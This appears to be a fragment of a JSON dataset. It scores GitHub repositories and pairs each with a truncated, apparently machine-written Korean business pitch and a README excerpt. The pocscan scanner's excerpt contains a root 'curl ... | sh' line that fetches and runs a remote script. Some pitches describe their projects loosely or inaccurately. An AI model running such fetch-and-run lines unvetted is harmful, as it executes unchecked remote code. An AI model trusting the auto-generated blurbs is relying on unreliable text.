기기에서 왔는지 추적하여 모바일/PC 사용자별 행동 분석 서비스 제공\n2. *","readme_excerpt":"DeviceDetector\n==============\n\n[![Latest Stable Version](https://poser.pugx.org/matomo/device-detector/v/stable)](https://packagist.org/packages/matomo/device-detector)\n[![Total Downloads](https://poser.pugx.org/matomo/device-detector/downloads)](https://packagist.org/packages/matomo/device-detector)\n[![License](https://poser.pugx.org/matomo/device-detector/license)](https://packagist.org/packages/matomo/device-detector)\n\n## Code Status\n\n[![PHPUnit](https://github.com/matomo-org/device-detector/actions/workflows/phpunit.yml/badge.svg?branch=master)](https://github.com/matomo-org/device-detector/actions/workflows/phpunit.yml?branch=master \"PHPUnit\")\n[![PHPStan](https://github.com/matomo-org/device-detector/actions/workflows/phpstan.yml/badge.svg?branch=master)](https://github.com/matomo-org/device-detector/actions/workflows/phpstan.yml?branch=master \"PHPStan\")\n[![PHPCS](https://github.com/matomo-org/device-detector/actions/workflows/phpcs.yml/badge.svg?branch=master)](https://github.com","composite_score":0.1434,"license_safety_tag":"restricted"},{"name":"accurics/terrascan","github_url":"https://github.com/accurics/terrascan","stars":8,"language":"Go","license":"Apache-2.0","abandonment_months":6,"description":"# Terrascan 저장소 분석\n\n## 왜 보물인가\n회사의 클라우드 인프라 설정에서 보안 문제를 자동으로 찾아주는 검사 도구로, 비용 낭비와 해킹 위험을 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 보안 검사 플랫폼**\n- 중소기업들이 자신의 클라우드 환경을 월 구독으로 자동 검사받는 웹 서비스\n\n**2. 내","readme_excerpt":"## ⚠️ Archived\n> - This project is no longer maintained. The repository is archived and no further updates, issues, or pull requests will be accepted.\n> - Feel free to fork it if you'd like to continue development.\n\n![Terrascan](https://raw.githubusercontent.com/tenable/runterrascan.io/main/static/images/TerrascanTM_BY_Logo.png)\n\n[![GitHub release](https://img.shields.io/github/release/tenable/terrascan)](https://github.com/tenable/terrascan/releases/latest)\n[![License: Apache 2.0](https://img.shields.io/badge/license-Apache%202-blue)](https://github.com/tenable/terrascan/blob/master/LICENSE)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/tenable/terrascan/pulls)\n![CI](https://github.com/tenable/terrascan/workflows/build/badge.svg)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=tenable_terrascan&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=tenable_terrascan)\n[![AUR package](https://repol","composite_score":0.1434,"license_safety_tag":"safe"},{"name":"robbiehanson/CocoaAsyncSocket","github_url":"https://github.com/robbiehanson/CocoaAsyncSocket","stars":10,"language":"Objective-C","license":"NOASSERTION","abandonment_months":2,"description":"# CocoaAsyncSocket 기술 분석\n\n## 왜 보물인가\n스마트폰 앱에서 인터넷 통신을 안정적으로 처리하는 핵심 도구로, 많은 유명 앱들이 내부적으로 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 채팅 앱 서비스**: 메시지를 즉시 전달하는 채팅 플랫폼의 기술 기반으로 제공\n2. **게임 서버 연결 솔루션**: 온라인 게임 개발사에 ","readme_excerpt":"# CocoaAsyncSocket\n[![Build Status](https://travis-ci.org/robbiehanson/CocoaAsyncSocket.svg?branch=master)](https://travis-ci.org/robbiehanson/CocoaAsyncSocket) [![Version Status](https://img.shields.io/cocoapods/v/CocoaAsyncSocket.svg?style=flat)](http://cocoadocs.org/docsets/CocoaAsyncSocket) [![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage) [![Platform](http://img.shields.io/cocoapods/p/CocoaAsyncSocket.svg?style=flat)](http://cocoapods.org/?q=CocoaAsyncSocket) [![license Public Domain](https://img.shields.io/badge/license-Public%20Domain-orange.svg?style=flat)](https://en.wikipedia.org/wiki/Public_domain)\n\n\nCocoaAsyncSocket provides easy-to-use and powerful asynchronous socket libraries for macOS, iOS, and tvOS. The classes are described below.\n\n## Installation\n\n#### CocoaPods\n\nInstall using [CocoaPods](https://cocoapods.org) by adding this line to your Podfile:\n\n````ruby\nuse_frameworks! # Add this","composite_score":0.1432,"license_safety_tag":"unknown"},{"name":"crossoverJie/cim","github_url":"https://github.com/crossoverJie/cim","stars":5,"language":"Java","license":"MIT","abandonment_months":2,"description":"# CIM 저장소 분석\n\n## 왜 보물인가\n실시간으로 메시지를 주고받는 통신 시스템을 직접 만들 수 있는 도구로, 채팅앱이나 알림 서비스 같은 다양한 서비스의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 팀 협업 도구(Slack 같은 업무용 메신저) 또는 실시간 알림 서비스 구축\n- **내부 업무 도구**: 회사 내부 직원들 간","readme_excerpt":"\n\n\n<div align=\"center\">\n\n<img src=\"https://i.loli.net/2020/02/21/rfOGvKlTcHCmM92.png\"  />\n<br/>\n\n[![codecov](https://codecov.io/gh/crossoverJie/cim/graph/badge.svg?token=oW5Gd1oKmf)](https://codecov.io/gh/crossoverJie/cim)\n[![Build Status](https://img.shields.io/badge/cim-cross--im-brightgreen.svg)](https://github.com/crossoverJie/cim)\n[![](https://badge.juejin.im/entry/5c2c000e6fb9a049f5713e26/likes.svg?style=flat-square)](https://juejin.im/post/5c2bffdc51882509181395d7)\n\n📘[Introduction](#introduction) |📽[Video Demo](#video-demo) | 🏖[TODO LIST](#todo-list) | 🌈[Architecture](#architecture) |💡[Flow Chart](#flow-chart)|🌁[Quick Start](#quick-start)|👨🏻‍✈️[Built-in Commands](#built-in-commands)|🎤[Chat](#group-chatprivate-chat)|❓[QA](https://github.com/crossoverJie/cim/blob/master/doc/QA.md)|💌[Contact](#contact)\n\n[中文文档](README-zh.md)\n\n</div>\n<br/>\n\n# V2.0\n- [x] Upgrade to JDK17 & springboot3.0\n- [x] Client SDK\n- [ ] Client use [picocli](https://picocli.info/) instead of springboot.\n- [x] Sup","composite_score":0.143,"license_safety_tag":"safe"},{"name":"cool-team-official/cool-admin-midway","github_url":"https://github.com/cool-team-official/cool-admin-midway","stars":5,"language":"TypeScript","license":"NOASSERTION","abandonment_months":6,"description":"# cool-admin-midway 프로젝트 분석\n\n## 왜 보물인가\n회사 내부 업무 관리 시스템을 빠르게 만들 수 있는 기반이 되어, 비용 큰 외주 개발을 피할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 직원 정보 관리, 근무 현황, 결재 시스템 등 회사 내부 운영 시스템으로 제공\n2. **SaaS 서비스**: 중소기업용 저렴","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://midwayjs.org/\" target=\"blank\"><img src=\"https://cool-show.oss-cn-shanghai.aliyuncs.com/admin/logo.png\" width=\"200\" alt=\"Midway Logo\" /></a>\n</p>\n\n<p align=\"center\">cool-admin(nodejs版)一个很酷的后台权限管理系统，开源免费，Ai编码、流程编排、模块化、插件化、极速开发CRUD，方便快速构建迭代后台管理系统，支持原生、docker、普通服务器等多种方式部署\n到 <a href=\"https://cool-js.com\" target=\"_blank\">官网</a> 进一步了解。\n<p align=\"center\">\n    <a href=\"https://github.com/cool-team-official/cool-admin-midway/blob/master/LICENSE\" target=\"_blank\"><img src=\"https://img.shields.io/badge/license-MIT-green?style=flat-square\" alt=\"GitHub license\" />\n    <a href=\"\"><img src=\"https://img.shields.io/github/package-json/v/cool-team-official/cool-admin-midway?style=flat-square\" alt=\"GitHub tag\"></a>\n    <img src=\"https://img.shields.io/github/last-commit/cool-team-official/cool-admin-midway?style=flat-square\" alt=\"GitHub tag\"></a>\n</p>\n\n## 特性\n\nAi 时代，很多老旧的框架已经无法满足现代化的开发需求，Cool-Admin 开发了一系列的功能，让开发变得更简单、更快速、更高效。\n\n- **Ai 编码**：通过微调大模型学习框架特有写法，实现简单功能从 Api 接口到","composite_score":0.1428,"license_safety_tag":"unknown"},{"name":"Kreijstal/node-trollegle","github_url":"https://github.com/Kreijstal/node-trollegle","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":12,"description":"# Kreijstal/node-trollegle 분석\n\n## 왜 보물인가\n이 프로젝트는 익명 영상 채팅 서비스를 자동화할 수 있는 기술로, 콘텐츠 수집이나 사용자 행동 분석이 필요한 회사들이 찾는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 마케팅 업체가 경쟁사 영상 채팅 서비스 분석 도구로 패키징하여 구독 서비스 판매\n2. ","readme_excerpt":"\n     ,-----.,--.                  ,--. ,---.   ,--.,------.  ,------.\n    '  .--./|  | ,---. ,--.,--. ,-|  || o   \\  |  ||  .-.  \\ |  .---'\n    |  |    |  || .-. ||  ||  |' .-. |`..'  |  |  ||  |  \\  :|  `--, \n    '  '--'\\|  |' '-' ''  ''  '\\ `-' | .'  /   |  ||  '--'  /|  `---.\n     `-----'`--' `---'  `----'  `---'  `--'    `--'`-------' `------'\n    ----------------------------------------------------------------- \n\n\nWelcome to your Node.js project on Cloud9 IDE!\n\nThis chat example showcases how to use `socket.io` with a static `express` server.\n\n## Running the server\n\n1) Open `server.js` and start the app by clicking on the \"Run\" button in the top menu.\n\n2) Alternatively you can launch the app from the Terminal:\n\n    $ node server.js\n\nOnce the server is running, open the project in the shape of 'https://projectname-username.c9users.io/'. As you enter your name, watch the Users list (on the left) update. Once you press Enter or Send, the message is shared with all connected clients.","composite_score":0.1428,"license_safety_tag":"unknown"},{"name":"assertj/assertj-core","github_url":"https://github.com/assertj/assertj-core","stars":16,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# AssertJ-Core 프로젝트 분석\n\n## 왜 보물인가\n소프트웨어 품질을 자동으로 검증해주는 도구로, AI가 생성한 코드의 오류를 빠르게 찾아내는 데 특화되어 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 코딩 보조 서비스(SaaS)**: GitHub Copilot이나 ChatGPT 같은 AI 코드 생성 플랫폼에 내장하여 생성된 코드의 정확성을","readme_excerpt":"# AssertJ - Fluent Assertions for Java [![Maven Central](https://img.shields.io/maven-central/v/org.assertj/assertj-core.svg?label=Maven%20Central)](https://central.sonatype.com/artifact/org.assertj/assertj-core) [![Javadocs](https://www.javadoc.io/badge/org.assertj/assertj-core.svg)](https://www.javadoc.io/doc/org.assertj/assertj-core)\n\n[![CI](https://github.com/assertj/assertj/actions/workflows/main.yml/badge.svg?branch=main)](https://github.com/assertj/assertj/actions/workflows/main.yml?query=branch%3Amain)\n[![Binary Compatibility](https://github.com/assertj/assertj/actions/workflows/binary-compatibility.yml/badge.svg?branch=main)](https://github.com/assertj/assertj/actions/workflows/binary-compatibility.yml?query=branch%3Amain)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=joel-costigliola_assertj-core&metric=alert_status)](https://sonarcloud.io/dashboard?id=joel-costigliola_assertj-core)\n\nAssertJ provides a rich and intuitive set of strongly-type","composite_score":0.1426,"license_safety_tag":"safe"},{"name":"ly525/luban-h5","github_url":"https://github.com/ly525/luban-h5","stars":7,"language":"JavaScript","license":"GPL-3.0","abandonment_months":5,"description":"# Luban H5 분석 보고서\n\n## 왜 보물인가\n누구나 클릭만으로 예쁜 웹 페이지를 만들 수 있는 '디자인 자동화 도구'입니다.\n\n## 어디에 쓸 수 있나\n1. **마케팅팀용 SaaS**: 중소기업이 광고용 랜딩페이지를 직접 만들어 제작비 절감\n2. **이커머스 내부 도구**: 온라인 쇼핑몰이 상품 프로모션 페이지를 빠르게 생성\n3. **웹디자인 API","readme_excerpt":"[📖中文文档](https://ly525.github.io/luban-h5/zh/) || [📖English Docs](https://ly525.github.io/luban-h5/en/getting-started/introduction.html) | [README(en)](./README.en.md) || [论坛/社区](https://github.com/ly525/luban-h5/discussions) || [DeepWiki](https://deepwiki.com/ly525/luban-h5) || [zread](https://zread.ai/ly525/luban-h5)\n\n<h2 align=\"center\">\n 鲁班 H5\n</h2>\n<p align=\"center\">\n可视化搭建，拖拽生成移动端页面\n</p>\n<p align=\"center\">\nMobile Page Builder&Generator with Drag&Drop\n</p>\n\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n[![Docs](https://github.com/ly525/luban-h5/workflows/docs/badge.svg)](https://ly525.github.io/luban-h5/)\n[![Release](https://img.shields.io/github/v/release/ly525/luban-h5)](https://github.com/ly525/luban-h5/workflows/docs)\n[![Gitter](https://img.shields.io/gitter/room/luban-h5/community)](https://gitter.im/luban-h5/community)\n[![GitHub issues](https://img.shields.io/github/issues/ly525/luban-h5)](https://githu","composite_score":0.1425,"license_safety_tag":"restricted"},{"name":"pili-engineering/PLDroidPlayer","github_url":"https://github.com/pili-engineering/PLDroidPlayer","stars":6,"language":"","license":"unknown","abandonment_months":9,"description":"# PLDroidPlayer 분석 리포트\n\n## 왜 보물인가\n안드로이드 기기에서 동영상을 재생하는 핵심 기술로, 스트리밍 서비스나 동영상 앱을 만드는 회사들이 필수적으로 필요로 하는 부품입니다.\n\n## 어디에 쓸 수 있나\n1. **동영상 스트리밍 SaaS**: 유튜브처럼 안드로이드 사용자에게 동영상을 보여주는 웹 서비스에 내장\n2. **기업용 교육 플랫폼*","readme_excerpt":"# 停更通知\n\nPLDroidPlayer 已停止维护，不建议接入。\n","composite_score":0.1424,"license_safety_tag":"unknown"},{"name":"NucleoidJS/Nucleoid","github_url":"https://github.com/NucleoidJS/Nucleoid","stars":9,"language":"Python","license":"Apache-2.0","abandonment_months":1,"description":"# NucleoidJS/Nucleoid 분석 보고서\n\n## 왜 보물인가\nAI가 복잡한 논리 단계를 거쳐 정확한 답을 내릴 때 발생하는 오류를 감지하고 방지하는 기술로, 금융·의료·법률 등 실수가 치명적인 분야에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AI 챗봇 회사들을 위한 \"답변 신뢰도 검증\" 검사 서비스로 월 구독료 수집","readme_excerpt":"<h1 align=\"center\">Nucleoid</h1>\n<p align=\"center\">\n  Logic Language for LLMs\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.apache.org/licenses/LICENSE-2.0\"><img src=\"https://img.shields.io/badge/Apache-2.0-yellow?style=for-the-badge&logo=apache\" alt=\"License\" /></a>\n  <a href=\"https://www.npmjs.com/package/nucleoidai\"><img src=\"https://img.shields.io/badge/NPM-red?style=for-the-badge&logo=npm\" alt=\"NPM\" /></a>\n  <a href=\"https://discord.gg/wN49SNssUw\"><img src=\"https://img.shields.io/badge/Discord-lightgrey?style=for-the-badge&logo=discord\" alt=\"Discord\" /></a>\n</p>\n\n![Banner](.github/media/banner.gif)\n\n<br/>\n\nNucleoid is a declarative, logic-based, contextual runtime for Neuro-Symbolic AI. Nucleoid runtime tracks each statement in [IPL-inspired](https://en.wikipedia.org/wiki/Information_Processing_Language) declarative syntax and dynamically creates relationships between both logic and data statements in the knowledge graph to used in decision-making and problem-solving process.\n\n-","composite_score":0.1424,"license_safety_tag":"safe"},{"name":"Kreijstal/JavaScript-functions","github_url":"https://github.com/Kreijstal/JavaScript-functions","stars":10,"language":"JavaScript","license":"unknown","abandonment_months":12,"description":"# Kreijstal/JavaScript-functions 분석\n\n## 왜 보물인가\n웹사이트와 애플리케이션을 만드는 데 필수적인 기본 기능들을 모아놓은 실용적인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 SaaS**: 초보 개발자들이 구독해서 자주 쓰는 함수들을 바로 복사해 쓸 수 있는 편의 도구\n2. **개발팀 내부 도구**: 회사의 ","readme_excerpt":"[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/Kreijstal/JavaScript-functions)\n\n![https://travis-ci.org/Kreijstal/JavaScript-functions](https://travis-ci.org/Kreijstal/JavaScript-functions.svg?branch=master)\n\nThis repo was created loooong ago because I wanted to do some handy JavaScript projects\n\n","composite_score":0.1424,"license_safety_tag":"unknown"},{"name":"heartexlabs/label-studio","github_url":"https://github.com/heartexlabs/label-studio","stars":21,"language":"TypeScript","license":"Apache-2.0","abandonment_months":0,"description":"# Label Studio 비즈니스 분석\n\n## 왜 보물인가\n사진, 영상, 텍스트에 라벨(설명)을 붙이는 작업을 쉽게 관리할 수 있는 도구로, AI 학습에 필요한 데이터 준비 과정을 획기적으로 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 기업들이 자신의 데이터에 라벨을 붙이기 위해 월간 구독료를 내고 사용하는 온라인 플랫폼으로","readme_excerpt":"<img src=\"https://user-images.githubusercontent.com/12534576/192582340-4c9e4401-1fe6-4dbb-95bb-fdbba5493f61.png\"/>\n\n![GitHub](https://img.shields.io/github/license/heartexlabs/label-studio?logo=heartex) ![label-studio:build](https://github.com/HumanSignal/label-studio/workflows/label-studio:build/badge.svg) ![GitHub release](https://img.shields.io/github/v/release/heartexlabs/label-studio?include_prereleases)\n\n[Website](https://labelstud.io/) • [Docs](https://labelstud.io/guide/) • [Join Slack Community <img src=\"https://app.heartex.ai/docs/images/slack-mini.png\" width=\"18px\"/>](https://slack.labelstud.io/?source=github-1)\n\n\n## What is Label Studio?\n\n<!-- <a href=\"https://labelstud.io/blog/release-130.html\"><img src=\"https://github.com/HumanSignal/label-studio/raw/master/docs/themes/htx/source/images/release-130/LS-Hits-v1.3.png\" align=\"right\" /></a> -->\n\nLabel Studio is an open source data labeling tool. It lets you label data types like audio, text, images, videos, and time series wi","composite_score":0.1423,"license_safety_tag":"safe"},{"name":"weibocom/motan","github_url":"https://github.com/weibocom/motan","stars":6,"language":"Java","license":"NOASSERTION","abandonment_months":6,"description":"# weibocom/motan 분석 보고서\n\n## 왜 보물인가\n이 프로젝트는 마이크로서비스 아키텍처를 위한 통신 프레임워크로, 대규모 서비스 시스템에서 각 서비스 간 빠르고 안정적인 데이터 전송을 담당하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 플랫폼의 백엔드 인프라**\n- 회원 관리, 결제, 알림 등 여러 기능 모듈을 빠르게 연결","readme_excerpt":"# Motan\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/weibocom/motan/blob/master/LICENSE)\n[![Maven Central](https://img.shields.io/maven-central/v/com.weibo/motan.svg?label=Maven%20Central)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.weibo%22%20AND%20motan)\n[![codecov](https://codecov.io/gh/weibocom/motan/branch/master/graph/badge.svg?token=ngBqL0SPJS)](https://codecov.io/gh/weibocom/motan)\n[![OpenTracing-1.0 Badge](https://img.shields.io/badge/OpenTracing--1.0-enabled-blue.svg)](http://opentracing.io)\n[![Skywalking Tracing](https://img.shields.io/badge/Skywalking%20Tracing-enable-brightgreen.svg)](https://github.com/OpenSkywalking/skywalking)\n\n# Overview\n\nMotan is a cross-language remote procedure call(RPC) framework for rapid development of high performance distributed\nservices.\n\nRelated projects in Motan ecosystem:\n\n- [Motan-go](https://github.com/weibocom/motan-go) is golang implementation.\n- [Motan-PHP](https://github.com/w","composite_score":0.142,"license_safety_tag":"unknown"},{"name":"edn-query-language/eql","github_url":"https://github.com/edn-query-language/eql","stars":5,"language":"Clojure","license":"MIT","abandonment_months":7,"description":"# EQL(EDN Query Language) 저장소 분석\n\n## 왜 보물인가\n데이터베이스에서 필요한 정보를 쉽게 찾아낼 수 있도록 도와주는 '검색 언어'로, 복잡한 데이터 관리를 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 데이터 분석 플랫폼**: 고객사의 방대한 데이터에서 원하는 정보를 빠르게 검색할 수 있는 기능 제공\n2. **","readme_excerpt":":source-highlighter: coderay\n:source-language: clojure\n:toc:\n:toc-placement: preamble\n:sectlinks:\n:sectanchors:\n:sectnums:\nifdef::env-github,env-cljdoc[]\n:tip-caption: :bulb:\n:note-caption: :information_source:\n:important-caption: :heavy_exclamation_mark:\n:caution-caption: :fire:\n:warning-caption: :warning:\nendif::[]\n\nimage:./assets/eql_logo_github.png[]\n\nimage:https://img.shields.io/clojars/v/edn-query-language/eql.svg[link=https://clojars.org/edn-query-language/eql]\nimage:https://cljdoc.xyz/badge/edn-query-language/eql[link=https://cljdoc.xyz/d/edn-query-language/eql/CURRENT]\nimage:https://github.com/edn-query-language/eql/actions/workflows/test.yml/badge.svg[\"GitHub actions\", link=\"https://github.com/edn-query-language/eql/actions/workflows/test.yml\"]\n\nThis repository contains a specification for EQL and a support library to help the development\nof tools using it.\n\n== What is EQL?\n\nEQL is a declarative way to make hierarchical (and possibly nested) selections of information about da","composite_score":0.1419,"license_safety_tag":"safe"},{"name":"erevus-cn/pocscan","github_url":"https://github.com/erevus-cn/pocscan","stars":9,"language":"Python","license":"unknown","abandonment_months":11,"description":"# pocscan 저장소 분석\n\n## 왜 보물인가\n보안 취약점을 자동으로 찾아내는 검사 도구로, 기업의 사이버 보안 위험을 빠르게 진단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 고객에게 월 구독 형태로 웹사이트 보안 진단 서비스 제공\n2. **내부 업무 도구**: IT팀이 자사 시스템의 보안 문제를 주기적으로 점검하는 ","readme_excerpt":"## POCSCAN\n\n Pocscan是一款开源 Poc 调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC <font color=red>按照官方规范编写</font>的 Poc对目标域名进行扫描，通过 Docker 一键部署，麻麻再也不怕搭建麻烦了 。\n \nPocscan支持被动式扫描,还提供了chrome浏览器插件,插件会自动抓取你访问的网站host进行漏洞扫描。ε=ε=(ノ≧∇≦)ノ\n \n Pocscan 只是扫描框架，不提供Poc!!!  \n Pocscan 只是扫描框架，不提供Poc!!!  \n Pocscan 只是扫描框架，不提供Poc!!!  \n \n### Screenshots\n\n![前台](./screenshots/1.png)\n\n![爬虫](./screenshots/2.png)\n\n![sqlmap](./screenshots/3.png)\n\n### Installation\n\n1. 安装Docker, 然后下载镜像\n\n    \t$ sudo curl -sSL https://get.daocloud.io/docker | sh \n    \t$ sudo systemctl start docker\n    \t$ sudo docker pull daocloud.io/aber/pocscan:latest\n    \t$ sudo chmod -R 0777 [代码存放目录]\n    \t\n2. 把源码 clone 到本地,运行 docker 容器,把源码挂载到容器里\n\n        sudo docker run -d -v [代码存放目录的绝对路径]:/www -p 8090:8000 -p 8088:8088 daocloud.io/aber/pocscan:latest\n    \t\n    \t/*\n    \t-p 8090:8000 是将容器的8000端口映射到宿主机的8090端口\n    \t以上参数根据实际情况自行配置\n    \t*/\n    \t\n    \t\n3. 把poc文件按找分类放到 /pocscan/pocs/ 下的文件夹\n\n4. 访问一下 http://127.0.0.1:8090/login. 出现登录界面就是搭建成功了。后台和终端的帐号是root,密码是p","composite_score":0.1418,"license_safety_tag":"unknown"},{"name":"kripken/emscripten","github_url":"https://github.com/kripken/emscripten","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":0,"description":"# Emscripten 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 C/C++ 프로그램을 직접 실행할 수 있게 변환해주는 기술로, 기존 프로그램을 웹으로 옮기거나 고성능이 필요한 웹 서비스를 만들 때 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **이미지/영상 편집 SaaS**: Photoshop처럼 무거운 프로그램을 브라우저에서 바로 사용하는 ","readme_excerpt":"![emscripten logo](media/switch_logo.png)\n\nMain project page: <https://emscripten.org>\n\nGitHub CI status: [![CircleCI](https://circleci.com/gh/emscripten-core/emscripten.svg?style=svg)](https://circleci.com/gh/emscripten-core/emscripten/tree/main)\n\nChromium builder status: [emscripten-releases](https://ci.chromium.org/p/emscripten-releases)\n\nOverview\n--------\n\nEmscripten compiles C and C++ to [WebAssembly](https://webassembly.org/) using\n[LLVM](https://en.wikipedia.org/wiki/LLVM) and\n[Binaryen](https://github.com/WebAssembly/binaryen/). Emscripten output can run\non the Web, in Node.js, and in\n[wasm runtimes](https://v8.dev/blog/emscripten-standalone-wasm#running-in-wasm-runtimes).\n\nEmscripten provides Web support for popular portable APIs such as OpenGL and\nSDL2, allowing complex graphical native applications to be ported, such as\nthe [Unity game engine](https://docs.unity3d.com/Manual/webgl-gettingstarted.html)\nand [Google Earth](https://blog.chromium.org/2019/06/webassembly-brings-go","composite_score":0.1417,"license_safety_tag":"unknown"},{"name":"apple/swift-algorithms","github_url":"https://github.com/apple/swift-algorithms","stars":6,"language":"Swift","license":"apache-2.0","abandonment_months":6,"description":"# Swift Algorithms 저장소 분석\n\n## 왜 보물인가\nApple이 공식적으로 만든 프로그래밍 기초 도구 모음으로, 소프트웨어 개발의 품질과 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: iOS/macOS 앱 개발 플랫폼에서 개발자용 라이브러리 기능으로 제공\n2. **내부 업무 도구**: 소프트웨어 ","readme_excerpt":"# Swift Algorithms\n\n**Swift Algorithms** is an open-source package of sequence and collection algorithms, along with their related types.\n\n## Overview\n\nThe Algorithms package provides a variety of sequence and collection operations, letting you cycle over a collection's elements, find combinations and permutations, create a random sample, and more.\n\nFor example, the package includes a group of \"chunking\" methods, each of which breaks a collection into consecutive subsequences. One version tests adjacent elements to find the breaking point between chunks — you can use it to quickly separate an array into ascending runs:\n\n```swift\nlet numbers = [10, 20, 30, 10, 40, 40, 10, 20]\nlet chunks = numbers.chunked(by: { $0 <= $1 })\n// [[10, 20, 30], [10, 40, 40], [10, 20]]\n```\n\nAnother version looks for a change in the transformation of each successive value. You can use that to separate a list of names into groups by the first character:\n\n```swift\nlet names = [\"Cassie\", \"Chloe\", \"Jasmine\", \"Jord","composite_score":0.1416,"license_safety_tag":"safe"},{"name":"jopohl/urh","github_url":"https://github.com/jopohl/urh","stars":5,"language":"Python","license":"gpl-3.0","abandonment_months":5,"description":"# URH (Universal Radio Hacker) 분석\n\n## 왜 보물인가\n무선 통신 신호를 분석하고 해킹하는 전문 도구로, 보안 연구자와 무선통신 개발자들이 필수적으로 사용하는 틈새시장 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 회사의 SaaS 분석 플랫폼**: IoT 기기와 무선장비의 보안 취약점을 진단해주는 클라우드 기반 검사 서","readme_excerpt":"![URH image](https://raw.githubusercontent.com/jopohl/urh/master/data/icons/banner.png)\n\n[![CI](https://github.com/jopohl/urh/actions/workflows/ci.yml/badge.svg)](https://github.com/jopohl/urh/actions/workflows/ci.yml)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-black)](https://github.com/psf/black)\n[![PyPI version](https://badge.fury.io/py/urh.svg)](https://badge.fury.io/py/urh)\n[![Packaging status](https://repology.org/badge/tiny-repos/urh.svg)](https://repology.org/project/urh/versions)\n [![Blackhat Arsenal 2017](https://rawgit.com/toolswatch/badges/master/arsenal/usa/2017.svg)](http://www.toolswatch.org/2017/06/the-black-hat-arsenal-usa-2017-phenomenal-line-up-announced/)\n [![Blackhat Arsenal 2018](https://rawgit.com/toolswatch/badges/master/arsenal/europe/2018.svg)](http://www.toolswatch.org/2018/09/black-hat-arsenal-europe-2018-lineup-announced/)\n\n\nThe Universal Radio Hacker (URH) is a complete suite for wireless protocol investigation with native suppor","composite_score":0.1415,"license_safety_tag":"restricted"},{"name":"chjj/marked","github_url":"https://github.com/chjj/marked","stars":8,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# chjj/marked 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 글을 예쁘게 표시해주는 도구로, 누구나 쉽게 글을 작성하고 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그/문서 서비스 SaaS**: 노션, 미디엄 같은 글쓰기 플랫폼에 내장하여 사용자가 깔끔한 형식으로 글을 작성하게 함\n2. **회사 내부 위키 도구**: 직","readme_excerpt":"<a href=\"https://marked.js.org\">\n  <img width=\"60px\" height=\"60px\" src=\"https://marked.js.org/img/logo-black.svg\" align=\"right\" />\n</a>\n\n# Marked\n\n[![npm](https://badgen.net/npm/v/marked)](https://www.npmjs.com/package/marked)\n[![install size](https://badgen.net/packagephobia/install/marked)](https://packagephobia.now.sh/result?p=marked)\n[![downloads](https://badgen.net/npm/dt/marked)](https://www.npmjs.com/package/marked)\n[![github actions](https://github.com/markedjs/marked/workflows/Tests/badge.svg)](https://github.com/markedjs/marked/actions)\n[![snyk](https://snyk.io/test/npm/marked/badge.svg)](https://snyk.io/test/npm/marked)\n\n- ⚡ built for speed\n- ⬇️ low-level compiler for parsing markdown without caching or blocking for long periods of time\n- ⚖️ light-weight while implementing all markdown features from the supported flavors & specifications\n- 🌐 works in a browser, on a server, or from a command line interface (CLI)\n\n## Demo\n\nCheck out the [demo page](https://marked.js.org/demo/","composite_score":0.1414,"license_safety_tag":"safe"},{"name":"ButchersBoy/MaterialDesignInXamlToolkit","github_url":"https://github.com/ButchersBoy/MaterialDesignInXamlToolkit","stars":5,"language":"C#","license":"mit","abandonment_months":0,"description":"# MaterialDesignInXamlToolkit 분석 보고서\n\n## 왜 보물인가\nWindows 프로그램을 만드는 개발자들이 '예쁜 버튼과 화면'을 쉽게 만들 수 있도록 도와주는 무료 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **회사 업무 소프트웨어 개발사**: 직원용 인사관리, 재무관리 프로그램을 빠르게 개발하는 데 활용\n2. **디자인 템플","readme_excerpt":"<!-- omit in toc -->\n# Material Design In XAML Toolkit ![Logo of Material Design in 